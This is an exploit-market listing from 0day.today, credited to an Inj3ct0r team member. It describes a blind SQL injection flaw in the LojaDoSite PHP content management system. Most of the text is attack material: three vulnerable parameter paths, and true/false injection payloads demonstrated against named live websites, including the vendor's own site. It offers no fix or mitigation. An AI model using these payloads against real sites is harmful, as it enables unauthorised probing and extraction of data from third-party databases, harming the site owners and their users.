[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

LojaDoSite Blind SQL Injection Vulnerability

Author
MasterGipy
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-13232
Category
web applications
Date add
08-07-2010
Platform
php
============================================
LojaDoSite Blind SQL Injection Vulnerability
============================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                 ###########################################          1
0                  I'm MasterGipy member from Inj3ct0r Team            1
1                 ###########################################          0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered By: MasterGipy

@Title: LojaDoSite Blind SQL Injection Vulnerability
@Author: MasterGipy
@Mail: mastergipy [at] gmail.com
@Vendor: http://www.lojadosite.com


@Path: http://www.mysite.com/news/news.php?id=[Blind SQLi]
@Path: http://www.mysite.com/catalog/show.php?id=[Blind SQLi]
@Path: http://www.mysite.com/index.php?page=[Blind SQLi]


@Demo:
+ http://sogecon.com/news/news.php?id=48 and+1-1=0 <- TRue
+ http://sogecon.com/news/news.php?id=48 and+1-1=1 <- FaLse

+ http://sogecon.com/catalog/show.php?id=186 and+1-1=0 <- TRue
+ http://sogecon.com/catalog/show.php?id=186 and+1-1=1 <- FaLse

+ http://sofilift.com/news/news.php?id=1268 and+1-1=0 <- TRue
+ http://sofilift.com/news/news.php?id=1268 and+1-1=1 <- FaLse


@vendor Page Vulnerability:
+ http://www.lojadosite.com/index.php?page=120 and+1-1=0 <- TRue
+ http://www.lojadosite.com/index.php?page=120 and+1-1=1 <- FaLse


@Platform: PHP
@CMS Version: All



#  0day.today [2024-11-14]  #